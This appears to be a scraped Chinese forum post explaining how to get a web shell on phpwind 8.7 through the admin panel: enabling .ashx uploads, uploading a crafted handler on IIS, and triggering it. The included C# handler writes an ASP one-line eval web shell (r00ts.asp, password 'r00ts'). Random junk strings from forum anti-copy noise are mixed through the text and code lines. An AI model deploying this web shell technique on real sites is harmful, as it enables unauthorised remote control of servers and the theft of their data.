phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
2 z  c! C5 Q; y1 e! {- d" J
0 h# f! J, b; d% [$ ^! v群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx

5 J; M0 O  Y& a/ J发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
2 c* d* ]! n9 V9 B( @
' E4 O5 V6 M( ?! R' u& r) [然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
- ~& @. D/ @0 a
下面是代码:

6 w4 s+ j/ ^: U5 p" x1 t<%@ WebHandler Language="C#"Class="Handler" %>
using System;
1 N$ F" K) W  [/ O  `using System.Web;
$ m  s: j+ ]. _" fusing System.IO;
) J: D" ~6 e+ T" N! Z5 }public class Handler : IHttpHandler {
, U* l- d" R9 g5 qpublic void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
4 R# b1 }$ o  |( o5 y2 i9 s; ^! [StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
1 P7 ]) p! h7 c$ }file1.Flush();
file1.Close();
}
) x  L; \/ W, Z, \public bool IsReusable {
get {
return false;
/ b, {! b- r$ o2 |. a  D; d}
, r' }' {  N; y/ U}
# o0 P2 G& P. J/ q- [+ O}